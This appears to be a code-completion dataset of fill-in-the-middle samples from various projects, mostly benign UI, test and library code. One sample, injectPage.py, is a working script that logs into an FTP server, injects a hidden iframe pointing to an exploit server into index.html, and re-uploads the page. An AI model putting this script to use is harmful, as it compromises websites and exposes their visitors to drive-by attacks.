file_name
stringlengths 3–137
| prefix
stringlengths 0–918k
| suffix
stringlengths 0–962k
| middle
stringlengths 0–812k
|
---|---|---|---|
_tickangle.py
|
import _plotly_utils.basevalidators
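# Validator for the icicle.marker.colorbar.tickangle property: angle-typed,
# with edits applied through the "colorbars" edit type.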
class TickangleValidator(_plotly_utils.basevalidators.AngleValidator):
|
super(TickangleValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "colorbars"),
**kwargs,
)
|
def __init__(
self, plotly_name="tickangle", parent_name="icicle.marker.colorbar", **kwargs
):
|
utils.test.ts
|
import * as utils from "../src/utils";
import * as os from "os";
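// os.type() is spied on per test so each platform branch of
// getExecutableExtension can be exercised in isolation.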
describe("Get executable extension", () => {
|
expect(os.type).toBeCalled();
});
test("returns empty string for non-windows OS", () => {
jest.spyOn(os, "type").mockReturnValue("Darwin");
expect(utils.getExecutableExtension()).toBe("");
expect(os.type).toBeCalled();
jest.spyOn(os, "type").mockReturnValue("Other");
expect(utils.getExecutableExtension()).toBe("");
expect(os.type).toBeCalled();
});
});
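// For reference, a minimal getExecutableExtension consistent with these tests
// (an assumed sketch, not necessarily this repo's implementation):
//   export function getExecutableExtension(): string {
//     return os.type() === "Windows_NT" ? ".exe" : "";
//   }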
|
test("returns .exe when os is Windows", () => {
jest.spyOn(os, "type").mockReturnValue("Windows_NT");
expect(utils.getExecutableExtension()).toBe(".exe");
|
002-comment-id.js
|
const _ = require('lodash');
const spec = require('../specs');
let checkCommentID;
checkCommentID = function checkCommentID(theme, options) {
const checkVersion = _.get(options, 'checkVersion', 'latest');
let ruleSet = spec.get([checkVersion]);
// CASE: 002-comment-id checks only needs `rules` that start with `GS002`
const ruleRegex = /GS002-.*/g;
|
}
});
_.each(ruleSet, function (check, ruleCode) {
_.each(theme.files, function (themeFile) {
var template = themeFile.file.match(/^[^/]+\.hbs$/) || themeFile.file.match(/^partials[/\\]+(.*)\.hbs$/);
if (template) {
if (themeFile.content.match(check.regex)) {
if (!Object.prototype.hasOwnProperty.call(theme.results.fail, (ruleCode))) {
theme.results.fail[ruleCode] = {failures: []};
}
theme.results.fail[ruleCode].failures.push(
{
ref: themeFile.file
}
);
}
}
});
if (theme.results.pass.indexOf(ruleCode) === -1 && !Object.prototype.hasOwnProperty.call(theme.results.fail, ruleCode)) {
theme.results.pass.push(ruleCode);
}
});
return theme;
};
module.exports = checkCommentID;
|
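// Keep only the GS002-prefixed rules out of the spec's full rule set.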
ruleSet = _.pickBy(ruleSet.rules, function (rule, ruleCode) {
if (ruleCode.match(ruleRegex)) {
return rule;
|
menuLine.js
|
import React from 'react';
import MenuItem from './menuItem';
import store from '../store';
import {selectDisk} from '../actions/diskActions';
import {setActiveDisk} from '../actions/diskActions';
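// Top menu bar of tabs; the disk-selection dispatches to the store are currently stubbed out.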
export default class MenuLine extends React.Component{
constructor(props) {
super(props);
}
componentDidMount()
{
//console.log("client Замаунтился, Ура!",this);
|
}
// When a client is selected in the list, update the edit form in the store
clickMeTender(){
console.log("Button clicked -", this);
//store.dispatch(setActiveDisk(this.props.disk));
//store.dispatch(selectDisk(this.props.index));
//var i = store.getState()["selectedDisk"]; // shift the index
//store.dispatch(setActiveDisk(store.getState()["AllDisks"][i]));
}
render(){
var ClassName;
// if(this.props.disk.id == store.getState()["activeDisk"].id){
// ClassName = "selected";
// } else ClassName = "tab";
ClassName = "tab";
return(
<div className="mainmenu">
<MenuItem value="Клиенты"/>
<MenuItem value="Диски"/>
<MenuItem value="Заказы"/>
<MenuItem value="Магазин"/>
<MenuItem value="Обзоры"/>
</div>
);
}
}
| |
slack.go
|
package slackcli
import (
"context"
"crypto/x509"
"fmt"
"time"
avcli "github.com/byuoitav/av-cli"
"github.com/slack-go/slack"
"go.uber.org/zap"
"google.golang.org/grpc"
)
type Client struct {
cli avcli.AvCliClient
cliToken string
slack *slack.Client
Log *zap.Logger
}
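// New dials the avcli gRPC API at cliAddr and returns a Client wired to Slack with the given tokens.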
func New(ctx context.Context, cliAddr string, cliToken string, slackToken string) (*Client, error)
|
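// handle runs f with the CLI auth for user, then posts the resulting message
// options back to the slash command's channel, with a 3-second timeout.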
func (c *Client) handle(req slack.SlashCommand, user string, f func(auth auth) []slack.MsgOption) {
auth := auth{
token: c.cliToken,
user: user,
}
opts := []slack.MsgOption{
slack.MsgOptionResponseURL(req.ResponseURL, slack.ResponseTypeInChannel),
}
opts = append(opts, f(auth)...)
ctx, cancel := context.WithTimeout(context.Background(), 3*time.Second)
defer cancel()
_, _, err := c.slack.PostMessageContext(ctx, req.ChannelID, opts...)
if err != nil {
c.Log.Warn("unable to post message to slack", zap.Error(err), zap.String("cmd", req.Command))
return
}
}
|
{
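// Use the system cert pool for transport security when dialing the avcli API.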
pool, err := x509.SystemCertPool()
if err != nil {
return nil, fmt.Errorf("unable to get system cert pool: %s", err)
}
conn, err := grpc.DialContext(ctx, cliAddr, getTransportSecurityDialOption(pool))
if err != nil {
return nil, fmt.Errorf("unable to connec to avcli API: %s", err)
}
return &Client{
cli: avcli.NewAvCliClient(conn),
cliToken: cliToken,
slack: slack.New(slackToken, slack.OptionDebug(true)),
}, nil
}
|
ArrowIosUp.tsx
|
/**
The MIT License (MIT)
*/
import { Props, createIcon } from '../Icon'
import React from 'react'
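// Forward the ref to the underlying span so callers can reach the rendered icon element.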
export default React.forwardRef((props: Props, ref: React.RefObject<HTMLSpanElement>) => (
createIcon(props, ref, {
filled: <path fillRule="evenodd" clipRule="evenodd" d="M17.9995 15C17.7735 15 17.5465 14.924 17.3595 14.768L11.9885 10.292L6.62651 14.607C6.19751 14.954 5.56751 14.886 5.22051 14.455C4.87451 14.025 4.94251 13.396 5.37351 13.049L11.3735 8.22098C11.7435 7.92198 12.2745 7.92598 12.6405 8.23198L18.6405 13.232C19.0645 13.585 19.1215 14.216 18.7685 14.64C18.5705 14.877 18.2865 15 17.9995 15Z"/>,
outline: <path fillRule="evenodd" clipRule="evenodd" d="M17.9995 15C17.7735 15 17.5465 14.924 17.3595 14.768L11.9885 10.292L6.62651 14.607C6.19751 14.954 5.56751 14.886 5.22051 14.455C4.87451 14.025 4.94251 13.396 5.37351 13.049L11.3735 8.22098C11.7435 7.92198 12.2745 7.92598 12.6405 8.23198L18.6405 13.232C19.0645 13.585 19.1215 14.216 18.7685 14.64C18.5705 14.877 18.2865 15 17.9995 15Z"/>,
|
))
|
})
|
Gen_PWSlot15.py
|
# -*- coding: utf-8 -*-
"""File generated according to PWSlot15/gen_list.json
WARNING! All changes made in this file will be lost!
"""
from pyleecan.GUI.Dialog.DMachineSetup.SWSlot.PWSlot15.Ui_PWSlot15 import Ui_PWSlot15
class Gen_PWSlot15(Ui_PWSlot15):
|
def setupUi(self, PWSlot15):
"""Abstract class to update the widget according to the csv doc"""
Ui_PWSlot15.setupUi(self, PWSlot15)
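# Each block below sets the same help text on an input's label, line edit, and
# unit widgets, and forbids negative values via the line edit's validator.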
# Setup of in_W0
txt = self.tr(u"""Slot isthmus width.""")
self.in_W0.setWhatsThis(txt)
self.in_W0.setToolTip(txt)
# Setup of lf_W0
self.lf_W0.validator().setBottom(0)
txt = self.tr(u"""Slot isthmus width.""")
self.lf_W0.setWhatsThis(txt)
self.lf_W0.setToolTip(txt)
# Setup of unit_W0
txt = self.tr(u"""Slot isthmus width.""")
self.unit_W0.setWhatsThis(txt)
self.unit_W0.setToolTip(txt)
# Setup of in_W3
txt = self.tr(u"""Tooth width""")
self.in_W3.setWhatsThis(txt)
self.in_W3.setToolTip(txt)
# Setup of lf_W3
self.lf_W3.validator().setBottom(0)
txt = self.tr(u"""Tooth width""")
self.lf_W3.setWhatsThis(txt)
self.lf_W3.setToolTip(txt)
# Setup of unit_W3
txt = self.tr(u"""Tooth width""")
self.unit_W3.setWhatsThis(txt)
self.unit_W3.setToolTip(txt)
# Setup of in_H0
txt = self.tr(u"""Slot isthmus height.""")
self.in_H0.setWhatsThis(txt)
self.in_H0.setToolTip(txt)
# Setup of lf_H0
self.lf_H0.validator().setBottom(0)
txt = self.tr(u"""Slot isthmus height.""")
self.lf_H0.setWhatsThis(txt)
self.lf_H0.setToolTip(txt)
# Setup of unit_H0
txt = self.tr(u"""Slot isthmus height.""")
self.unit_H0.setWhatsThis(txt)
self.unit_H0.setToolTip(txt)
# Setup of in_H1
txt = self.tr(u"""Slot intermediate height.""")
self.in_H1.setWhatsThis(txt)
self.in_H1.setToolTip(txt)
# Setup of lf_H1
self.lf_H1.validator().setBottom(0)
txt = self.tr(u"""Slot intermediate height.""")
self.lf_H1.setWhatsThis(txt)
self.lf_H1.setToolTip(txt)
# Setup of unit_H1
txt = self.tr(u"""Slot intermediate height.""")
self.unit_H1.setWhatsThis(txt)
self.unit_H1.setToolTip(txt)
# Setup of in_H2
txt = self.tr(u"""Slot height""")
self.in_H2.setWhatsThis(txt)
self.in_H2.setToolTip(txt)
# Setup of lf_H2
self.lf_H2.validator().setBottom(0)
txt = self.tr(u"""Slot height""")
self.lf_H2.setWhatsThis(txt)
self.lf_H2.setToolTip(txt)
# Setup of unit_H2
txt = self.tr(u"""Slot height""")
self.unit_H2.setWhatsThis(txt)
self.unit_H2.setToolTip(txt)
# Setup of in_R1
txt = self.tr(u"""Top radius""")
self.in_R1.setWhatsThis(txt)
self.in_R1.setToolTip(txt)
# Setup of lf_R1
self.lf_R1.validator().setBottom(0)
txt = self.tr(u"""Top radius""")
self.lf_R1.setWhatsThis(txt)
self.lf_R1.setToolTip(txt)
# Setup of unit_R1
txt = self.tr(u"""Top radius""")
self.unit_R1.setWhatsThis(txt)
self.unit_R1.setToolTip(txt)
# Setup of in_R2
txt = self.tr(u"""Bottom radius""")
self.in_R2.setWhatsThis(txt)
self.in_R2.setToolTip(txt)
# Setup of lf_R2
self.lf_R2.validator().setBottom(0)
txt = self.tr(u"""Bottom radius""")
self.lf_R2.setWhatsThis(txt)
self.lf_R2.setToolTip(txt)
# Setup of unit_R2
txt = self.tr(u"""Bottom radius""")
self.unit_R2.setWhatsThis(txt)
self.unit_R2.setToolTip(txt)
|
|
unknown.rs
|
//! Unknown messages.
use bytes::{Buf, BufMut};
use crate::{wire_format::WireFormat, SbpMessage};
/// The message returned by the parser when the message type does not correspond to a known message.
#[cfg_attr(feature = "serde", derive(serde::Serialize, serde::Deserialize))]
#[derive(Debug, Clone)]
pub struct Unknown {
/// The message id of the message.
pub msg_id: u16,
/// The message sender_id.
pub sender_id: Option<u16>,
/// Raw payload of the message.
pub payload: Vec<u8>,
}
impl SbpMessage for Unknown {
fn message_name(&self) -> &'static str {
"UNKNOWN"
}
fn message_type(&self) -> u16 {
self.msg_id
}
fn sender_id(&self) -> Option<u16>
|
fn set_sender_id(&mut self, new_id: u16) {
self.sender_id = Some(new_id);
}
fn encoded_len(&self) -> usize {
WireFormat::len(self) + crate::HEADER_LEN + crate::CRC_LEN
}
}
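// On the wire an Unknown message is just its raw payload; msg_id and sender_id
// come from the framing layer, so parse_unchecked leaves them at placeholder values.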
impl WireFormat for Unknown {
fn len(&self) -> usize {
self.payload.len()
}
fn write<B: BufMut>(&self, buf: &mut B) {
self.payload.write(buf)
}
fn parse_unchecked<B: Buf>(buf: &mut B) -> Self {
Unknown {
msg_id: 0,
sender_id: None,
payload: WireFormat::parse_unchecked(buf),
}
}
}
|
{
self.sender_id
}
|
injectPage.py
|
#!/usr/bin/env python
import ftplib
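# Python 2 script: downloads a page over FTP, appends a malicious iframe redirect, and re-uploads it.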
def
|
():
print " ##### Malicious Inject p61 #####"
print " There is some use of Metasploit in this "
print " section that warrants a good read. "
def injectPage(ftp, page, redirect):
f = open(page + '.tmp', 'w')
ftp.retrlines('RETR ' + page, f.write)
print '[+] Downloaded Page: '+page
f.write(redirect)
f.close()
print '[+] Injected Malicious IFrame on: '+page
ftp.storlines('STOR '+page, open(page+ '.tmp'))
print '[+] Uploaded Injected Page: '+page
host = '192.168.95.179'
userName = 'guest'
passWord = 'guest'
ftp = ftplib.FTP(host)
ftp.login(userName, passWord)
redirect = '<iframe src='+'"http://10.10.10.112:8080/exploit"></iframe>'
injectPage(ftp, 'index.html', redirect)
|
banner
|
hicharts.custom.js
|
/*
@product.name@ JS v@product.version@ (@product.date@)
(c) 2009-2014 Torstein Honsi
License: www.highcharts.com/license
@product.name@ JS v@product.version@ (@product.date@)
Plugin for displaying a message when there is no data visible in chart.
(c) 2010-2014 Highsoft AS
Author: Oystein Moseng
License: www.highcharts.com/license
*/
(function(){function t(a,b){var c;a||(a={});for(c in b)a[c]=b[c];return a}function E(){var a,b=arguments,c,d={},e=function(a,b){var c,d;"object"!==typeof a&&(a={});for(d in b)b.hasOwnProperty(d)&&((c=b[d])&&"object"===typeof c&&"[object Array]"!==Object.prototype.toString.call(c)&&"renderTo"!==d&&"number"!==typeof c.nodeType?a[d]=e(a[d]||{},c):a[d]=b[d]);return a};!0===b[0]&&(d=b[1],b=Array.prototype.slice.call(b,2));c=b.length;for(a=0;a<c;a++)d=e(d,b[a]);return d}function A(a,b){return parseInt(a,
b||10)}function U(a){return"string"===typeof a}function V(a){return"object"===typeof a}function ka(a){return"[object Array]"===Object.prototype.toString.call(a)}function $(a){return"number"===typeof a}function aa(a){return Q.log(a)/Q.LN10}function L(a){return Q.pow(10,a)}function oa(a,b){for(var c=a.length;c--;)if(a[c]===b){a.splice(c,1);break}}function u(a){return a!==v&&null!==a}function G(a,b,c){var d,e;if(U(b))u(c)?a.setAttribute(b,c):a&&a.getAttribute&&(e=a.getAttribute(b));else if(u(b)&&V(b))for(d in b)a.setAttribute(d,
b[d]);return e}function ha(a){return ka(a)?a:[a]}function r(){var a=arguments,b,c,d=a.length;for(b=0;b<d;b++)if(c=a[b],"undefined"!==typeof c&&null!==c)return c}function X(a,b){pa&&!ba&&b&&b.opacity!==v&&(b.filter="alpha(opacity="+100*b.opacity+")");t(a.style,b)}function ta(a,b,c,d,e){a=y.createElement(a);b&&t(a,b);e&&X(a,{padding:0,border:ca,margin:0});c&&X(a,c);d&&d.appendChild(a);return a}function bb(a,b){var c=function(){};c.prototype=new a;t(c.prototype,b);return c}function qa(a,b,c,d){var e=
I.lang;a=+a||0;var f=-1===b?(a.toString().split(".")[1]||"").length:isNaN(b=R(b))?2:b;b=void 0===c?e.decimalPoint:c;d=void 0===d?e.thousandsSep:d;e=0>a?"-":"";c=String(A(a=R(a).toFixed(f)));var g=3<c.length?c.length%3:0;return e+(g?c.substr(0,g)+d:"")+c.substr(g).replace(/(\d{3})(?=\d)/g,"$1"+d)+(f?b+R(a-c).toFixed(f).slice(2):"")}function ra(a,b){return Array((b||2)+1-String(a).length).join(0)+a}function cb(a,b,c){var d=a[b];a[b]=function(){var a=Array.prototype.slice.call(arguments);a.unshift(d);
return c.apply(this,a)}}function ua(a,b){for(var c="{",d=!1,e,f,g,h,k,l=[];-1!==(c=a.indexOf(c));){e=a.slice(0,c);if(d){f=e.split(":");g=f.shift().split(".");k=g.length;e=b;for(h=0;h<k;h++)e=e[g[h]];f.length&&(f=f.join(":"),g=/\.([0-9])/,h=I.lang,k=void 0,/f$/.test(f)?(k=(k=f.match(g))?k[1]:-1,null!==e&&(e=qa(e,k,h.decimalPoint,-1<f.indexOf(",")?h.thousandsSep:""))):e=Ka(f,e))}l.push(e);a=a.slice(c+1);c=(d=!d)?"}":"{"}l.push(a);return l.join("")}function db(a){return Q.pow(10,F(Q.log(a)/Q.LN10))}
function eb(a,b,c,d){var e;c=r(c,1);e=a/c;b||(b=[1,2,2.5,5,10],d&&!1===d.allowDecimals&&(1===c?b=[1,2,5,10]:0.1>=c&&(b=[1/c])));for(d=0;d<b.length&&!(a=b[d],e<=(b[d]+(b[d+1]||b[d]))/2);d++);return a*c}function sb(){this.symbol=this.color=0}function fb(a,b){var c=a.length,d,e;for(e=0;e<c;e++)a[e].ss_i=e;a.sort(function(a,c){d=b(a,c);return 0===d?a.ss_i-c.ss_i:d});for(e=0;e<c;e++)delete a[e].ss_i}function va(a){for(var b=a.length,c=a[0];b--;)a[b]<c&&(c=a[b]);return c}function la(a){for(var b=a.length,
c=a[0];b--;)a[b]>c&&(c=a[b]);return c}function Da(a,b){for(var c in a)a[c]&&a[c]!==b&&a[c].destroy&&a[c].destroy(),delete a[c]}function La(a){Ma||(Ma=ta(tb));a&&Ma.appendChild(a);Ma.innerHTML=""}function fa(a,b){var c="Highcharts error #"+a+": www.highcharts.com/errors/"+a;if(b)throw c;O.console&&console.log(c)}function ia(a){return parseFloat(a.toPrecision(14))}function ub(){var a=I.global.useUTC,b=a?"getUTC":"get",c=a?"setUTC":"set";wa=6E4*(a&&I.global.timezoneOffset||0);Na=a?Date.UTC:function(a,
b,c,g,h,k){return(new Date(a,b,r(c,1),r(g,0),r(h,0),r(k,0))).getTime()};gb=b+"Minutes";hb=b+"Hours";ib=b+"Day";Ea=b+"Date";Oa=b+"Month";Pa=b+"FullYear";vb=c+"Minutes";wb=c+"Hours";jb=c+"Date";xb=c+"Month";yb=c+"FullYear"}function W(){}function xa(a,b,c,d){this.axis=a;this.pos=b;this.type=c||"";this.isNew=!0;c||d||this.addLabel()}function sa(){this.init.apply(this,arguments)}function Qa(){this.init.apply(this,arguments)}var v,y=document,O=window,Q=Math,z=Q.round,F=Q.floor,ya=Q.ceil,x=Q.max,J=Q.min,
R=Q.abs,Fa=Q.cos,Ra=Q.sin,zb=Q.PI,Ab=2*zb/360,ma=navigator.userAgent,Jb=O.opera,pa=/msie/i.test(ma)&&!Jb,Bb=/AppleWebKit/.test(ma),Sa=/Firefox/.test(ma),Cb=/(Mobile|Android|Windows Phone)/.test(ma),ja="http://www.w3.org/2000/svg",ba=!!y.createElementNS&&!!y.createElementNS(ja,"svg").createSVGRect,Kb=Sa&&4>parseInt(ma.split("Firefox/")[1],10),da=!ba&&!pa&&!!y.createElement("canvas").getContext,Ta,Ga,Db={},kb=0,Ma,I,Ka,ea,lb,B,Lb=function(){},Y=[],Ha=0,tb="div",ca="none",Mb=/^[0-9]+$/,Nb="stroke-width",
Na,wa,gb,hb,ib,Ea,Oa,Pa,vb,wb,jb,xb,yb,M={},S=O.Highcharts=O.Highcharts?fa(16,!0):{};Ka=function(a,b,c){if(!u(b)||isNaN(b))return"Invalid date";a=r(a,"%Y-%m-%d %H:%M:%S");var d=new Date(b-wa),e,f=d[hb](),g=d[ib](),h=d[Ea](),k=d[Oa](),l=d[Pa](),m=I.lang,n=m.weekdays,d=t({a:n[g].substr(0,3),A:n[g],d:ra(h),e:h,b:m.shortMonths[k],B:m.months[k],m:ra(k+1),y:l.toString().substr(2,2),Y:l,H:ra(f),I:ra(f%12||12),l:f%12||12,M:ra(d[gb]()),p:12>f?"AM":"PM",P:12>f?"am":"pm",S:ra(d.getSeconds()),L:ra(z(b%1E3),3)},
S.dateFormats);for(e in d)for(;-1!==a.indexOf("%"+e);)a=a.replace("%"+e,"function"===typeof d[e]?d[e](b):d[e]);return c?a.substr(0,1).toUpperCase()+a.substr(1):a};sb.prototype={wrapColor:function(a){this.color>=a&&(this.color=0)},wrapSymbol:function(a){this.symbol>=a&&(this.symbol=0)}};B=function(){for(var a=0,b=arguments,c=b.length,d={};a<c;a++)d[b[a++]]=b[a];return d}("millisecond",1,"second",1E3,"minute",6E4,"hour",36E5,"day",864E5,"week",6048E5,"month",26784E5,"year",31556952E3);lb={init:function(a,
b,c){b=b||"";var d=a.shift,e=-1<b.indexOf("C"),f=e?7:3,g;b=b.split(" ");c=[].concat(c);var h,k,l=function(a){for(g=a.length;g--;)"M"===a[g]&&a.splice(g+1,0,a[g+1],a[g+2],a[g+1],a[g+2])};e&&(l(b),l(c));a.isArea&&(h=b.splice(b.length-6,6),k=c.splice(c.length-6,6));if(d<=c.length/f&&b.length===c.length)for(;d--;)c=[].concat(c).splice(0,f).concat(c);a.shift=0;if(b.length)for(a=c.length;b.length<a;)d=[].concat(b).splice(b.length-f,f),e&&(d[f-6]=d[f-2],d[f-5]=d[f-1]),b=b.concat(d);h&&(b=b.concat(h),c=c.concat(k));
return[b,c]},step:function(a,b,c,d){var e=[],f=a.length;if(1===c)e=d;else if(f===b.length&&1>c)for(;f--;)d=parseFloat(a[f]),e[f]=isNaN(d)?a[f]:c*parseFloat(b[f]-d)+d;else e=b;return e}};(function(a){O.HighchartsAdapter=O.HighchartsAdapter||a&&{init:function(b){var c=a.fx,d=c.step,e,f=a.Tween,g=f&&f.propHooks;e=a.cssHooks.opacity;a.extend(a.easing,{easeOutQuad:function(a,b,c,d,e){return-d*(b/=e)*(b-2)+c}});a.each(["cur","_default","width","height","opacity"],function(a,b){var e=d,m;"cur"===b?e=c.prototype:
"_default"===b&&f&&(e=g[b],b="set");(m=e[b])&&(e[b]=function(c){var d;c=a?c:this;if("align"!==c.prop)return d=c.elem,d.attr?d.attr(c.prop,"cur"===b?v:c.now):m.apply(this,arguments)})});cb(e,"get",function(a,b,c){return b.attr?b.opacity||0:a.call(this,b,c)});e=function(a){var c=a.elem,d;a.started||(d=b.init(c,c.d,c.toD),a.start=d[0],a.end=d[1],a.started=!0);c.attr("d",b.step(a.start,a.end,a.pos,c.toD))};f?g.d={set:e}:d.d=e;this.each=Array.prototype.forEach?function(a,b){return Array.prototype.forEach.call(a,
b)}:function(a,b){for(var c=0,d=a.length;c<d;c++)if(!1===b.call(a[c],a[c],c,a))return c};a.fn.highcharts=function(){var a="Chart",b=arguments,c,d;this[0]&&(U(b[0])&&(a=b[0],b=Array.prototype.slice.call(b,1)),c=b[0],c!==v&&(c.chart=c.chart||{},c.chart.renderTo=this[0],new S[a](c,b[1]),d=this),c===v&&(d=Y[G(this[0],"data-highcharts-chart")]));return d}},getScript:a.getScript,inArray:a.inArray,adapterRun:function(b,c){return a(b)[c]()},grep:a.grep,map:function(a,c){for(var d=[],e=0,f=a.length;e<f;e++)d[e]=
c.call(a[e],a[e],e,a);return d},offset:function(b){return a(b).offset()},addEvent:function(b,c,d){a(b).bind(c,d)},removeEvent:function(b,c,d){var e=y.removeEventListener?"removeEventListener":"detachEvent";y[e]&&b&&!b[e]&&(b[e]=function(){});a(b).unbind(c,d)},fireEvent:function(b,c,d,e){var f=a.Event(c),g="detached"+c,h;!pa&&d&&(delete d.layerX,delete d.layerY,delete d.returnValue);t(f,d);b[c]&&(b[g]=b[c],b[c]=null);a.each(["preventDefault","stopPropagation"],function(a,b){var c=f[b];f[b]=function(){try{c.call(f)}catch(a){"preventDefault"===
b&&(h=!0)}}});a(b).trigger(f);b[g]&&(b[c]=b[g],b[g]=null);!e||f.isDefaultPrevented()||h||e(f)},washMouseEvent:function(a){var c=a.originalEvent||a;c.pageX===v&&(c.pageX=a.pageX,c.pageY=a.pageY);return c},animate:function(b,c,d){var e=a(b);b.style||(b.style={});c.d&&(b.toD=c.d,c.d=1);e.stop();c.opacity!==v&&b.attr&&(c.opacity+="px");e.animate(c,d)},stop:function(b){a(b).stop()}}})(O.jQuery);var Ua=O.HighchartsAdapter,Z=Ua||{};Ua&&Ua.init.call(Ua,lb);var Va=Z.adapterRun,Ob=Z.getScript,Wa=Z.inArray,
s=Z.each,mb=Z.grep,Pb=Z.offset,Xa=Z.map,N=Z.addEvent,T=Z.removeEvent,C=Z.fireEvent,Qb=Z.washMouseEvent,Eb=Z.animate,Ya=Z.stop,nb={enabled:!0,x:0,y:15,style:{color:"#606060",cursor:"default",fontSize:"11px"}};I={colors:"#7cb5ec #434348 #90ed7d #f7a35c #8085e9 #f15c80 #e4d354 #8085e8 #8d4653 #91e8e1".split(" "),symbols:["circle","diamond","square","triangle","triangle-down"],lang:{loading:"Loading...",months:"January February March April May June July August September October November December".split(" "),
|
backgroundColor:"white",opacity:0.5,textAlign:"center"}},tooltip:{enabled:!0,animation:ba,backgroundColor:"rgba(249, 249, 249, .85)",borderWidth:1,borderRadius:3,dateTimeLabelFormats:{millisecond:"%A, %b %e, %H:%M:%S.%L",second:"%A, %b %e, %H:%M:%S",minute:"%A, %b %e, %H:%M",hour:"%A, %b %e, %H:%M",day:"%A, %b %e, %Y",week:"Week from %A, %b %e, %Y",month:"%B %Y",year:"%Y"},headerFormat:'<span style="font-size: 10px">{point.key}</span><br/>',pointFormat:'<span style="color:{series.color}">\u25cf</span> {series.name}: <b>{point.y}</b><br/>',
shadow:!0,snap:Cb?25:10,style:{color:"#333333",cursor:"default",fontSize:"12px",padding:"8px",whiteSpace:"nowrap"}},credits:{enabled:!0,text:"Highcharts.com",href:"http://www.highcharts.com",position:{align:"right",x:-10,verticalAlign:"bottom",y:-5},style:{cursor:"pointer",color:"#909090",fontSize:"9px"}}};var za=I.plotOptions,Rb=za.line;ub();var Sb=/rgba\(\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*,\s*([0-9]?(?:\.[0-9]+)?)\s*\)/,Tb=/#([a-fA-F0-9]{2})([a-fA-F0-9]{2})([a-fA-F0-9]{2})/,
Ub=/rgb\(\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*\)/,Aa=function(a){var b=[],c,d;(function(a){a&&a.stops?d=Xa(a.stops,function(a){return Aa(a[1])}):(c=Sb.exec(a))?b=[A(c[1]),A(c[2]),A(c[3]),parseFloat(c[4],10)]:(c=Tb.exec(a))?b=[A(c[1],16),A(c[2],16),A(c[3],16),1]:(c=Ub.exec(a))&&(b=[A(c[1]),A(c[2]),A(c[3]),1])})(a);return{get:function(c){var f;d?(f=E(a),f.stops=[].concat(f.stops),s(d,function(a,b){f.stops[b]=[f.stops[b][0],a.get(c)]})):f=b&&!isNaN(b[0])?"rgb"===c?"rgb("+b[0]+","+
b[1]+","+b[2]+")":"a"===c?b[3]:"rgba("+b.join(",")+")":a;return f},brighten:function(a){if(d)s(d,function(b){b.brighten(a)});else if($(a)&&0!==a){var c;for(c=0;3>c;c++)b[c]+=A(255*a),0>b[c]&&(b[c]=0),255<b[c]&&(b[c]=255)}return this},rgba:b,setOpacity:function(a){b[3]=a;return this}}};W.prototype={init:function(a,b){this.element="span"===b?ta(b):y.createElementNS(ja,b);this.renderer=a},opacity:1,animate:function(a,b,c){b=r(b,ea,!0);Ya(this);b?(b=E(b,{}),c&&(b.complete=c),Eb(this,a,b)):(this.attr(a),
c&&c())},colorGradient:function(a,b,c){var d=this.renderer,e,f,g,h,k,l,m,n,q,p,w=[];a.linearGradient?f="linearGradient":a.radialGradient&&(f="radialGradient");if(f){g=a[f];h=d.gradients;l=a.stops;q=c.radialReference;ka(g)&&(a[f]=g={x1:g[0],y1:g[1],x2:g[2],y2:g[3],gradientUnits:"userSpaceOnUse"});"radialGradient"===f&&q&&!u(g.gradientUnits)&&(g=E(g,{cx:q[0]-q[2]/2+g.cx*q[2],cy:q[1]-q[2]/2+g.cy*q[2],r:g.r*q[2],gradientUnits:"userSpaceOnUse"}));for(p in g)"id"!==p&&w.push(p,g[p]);for(p in l)w.push(l[p]);
w=w.join(",");h[w]?a=h[w].attr("id"):(g.id=a="highcharts-"+kb++,h[w]=k=d.createElement(f).attr(g).add(d.defs),k.stops=[],s(l,function(a){0===a[1].indexOf("rgba")?(e=Aa(a[1]),m=e.get("rgb"),n=e.get("a")):(m=a[1],n=1);a=d.createElement("stop").attr({offset:a[0],"stop-color":m,"stop-opacity":n}).add(k);k.stops.push(a)}));c.setAttribute(b,"url("+d.url+"#"+a+")")}},attr:function(a,b){var c,d,e=this.element,f,g=this,h;"string"===typeof a&&b!==v&&(c=a,a={},a[c]=b);if("string"===typeof a)g=(this[a+"Getter"]||
this._defaultGetter).call(this,a,e);else{for(c in a)d=a[c],h=!1,this.symbolName&&/^(x|y|width|height|r|start|end|innerR|anchorX|anchorY)/.test(c)&&(f||(this.symbolAttr(a),f=!0),h=!0),!this.rotation||"x"!==c&&"y"!==c||(this.doTransform=!0),h||(this[c+"Setter"]||this._defaultSetter).call(this,d,c,e),this.shadows&&/^(width|height|visibility|x|y|d|transform|cx|cy|r)$/.test(c)&&this.updateShadows(c,d);this.doTransform&&(this.updateTransform(),this.doTransform=!1)}return g},updateShadows:function(a,b){for(var c=
this.shadows,d=c.length;d--;)c[d].setAttribute(a,"height"===a?x(b-(c[d].cutHeight||0),0):"d"===a?this.d:b)},addClass:function(a){var b=this.element,c=G(b,"class")||"";-1===c.indexOf(a)&&G(b,"class",c+" "+a);return this},symbolAttr:function(a){var b=this;s("x y r start end width height innerR anchorX anchorY".split(" "),function(c){b[c]=r(a[c],b[c])});b.attr({d:b.renderer.symbols[b.symbolName](b.x,b.y,b.width,b.height,b)})},clip:function(a){return this.attr("clip-path",a?"url("+this.renderer.url+"#"+
a.id+")":ca)},crisp:function(a){var b,c={},d,e=a.strokeWidth||this.strokeWidth||this.attr&&this.attr("stroke-width")||0;d=z(e)%2/2;a.x=F(a.x||this.x||0)+d;a.y=F(a.y||this.y||0)+d;a.width=F((a.width||this.width||0)-2*d);a.height=F((a.height||this.height||0)-2*d);a.strokeWidth=e;for(b in a)this[b]!==a[b]&&(this[b]=c[b]=a[b]);return c},css:function(a){var b=this.styles,c={},d=this.element,e,f,g="";e=!b;a&&a.color&&(a.fill=a.color);if(b)for(f in a)a[f]!==b[f]&&(c[f]=a[f],e=!0);if(e){e=this.textWidth=
